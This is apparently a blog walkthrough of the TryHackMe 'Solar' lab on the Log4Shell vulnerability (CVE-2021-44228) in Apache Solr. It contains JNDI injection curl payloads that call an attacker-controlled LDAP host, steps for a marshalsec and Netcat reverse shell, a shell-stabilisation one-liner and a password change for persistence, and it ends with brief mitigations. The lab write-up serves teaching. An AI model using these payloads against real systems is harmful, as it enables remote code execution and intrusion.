What is Log4j?

Log4j is a Java logging package, part of the Apache Logging Services project, used to capture logs. Everything you do on the internet becomes an event that gets captured in the form of a log entry, and the input you submit is captured in those logs as well.

So, in this case, the malicious input gets captured in the log, and when the log message is processed the input is evaluated, resulting in remote code execution. In other words, the attacker executes commands through the logging path.

Currently, the CVSS score of this vulnerability is 10, which makes it critical in severity. The CVE assigned to this vulnerability is CVE-2021-44228.

Practical Demonstration

We will be using the TryHackMe lab Solar, exploiting log4j, for the practical part.

Step 1 - Reconnaissance

Using Nmap, we found that port 8983 is running the Apache Solr service, which can be vulnerable to log4j.

Step 2 - Discovery

Let us try to find out the endpoint vulnerable to the exploit.

The path is /admin/cores, found in the log file solr.logs.

Let's try to send a malicious request to the endpoint using the payload below:

curl 'http://webserveraddress:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:9999}'

and start a listener for the reverse connection with nc -nlvp 9999, then execute the payload.

We received a signal on the listener (a few special characters), which means the target is vulnerable.

Step 3 - Exploitation

Let's create an LDAP server locally using marshalsec,

execute the server,

and create an exploit in Java, together with a Netcat listener and an HTTP server.

Now start the HTTP server, the Netcat listener and the LDAP service.

After that, execute the exploit

and again send the malicious request to the server:

curl 'http://serviceip:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:1389/Exploit}'

If everything goes well, you will receive a reverse shell on the Netcat listener.

Let us stabilize the shell, or try to get a more usable shell, using

python -c 'import pty; pty.spawn("/bin/bash")'

and check our permissions.

From the following output, we infer that there are no restrictions.

So we will try to get access as the solr user by changing the solr user's password using root privileges,

and now we SSH in as the solr user.

That is how one can try to exploit this vulnerability. However, exploitation is not limited to this path, as the vulnerability has many attack vectors. So better keep hustling.

Mitigation

  1. Keep the service updated
  2. Block exploit traffic by implementing firewall and egress rules
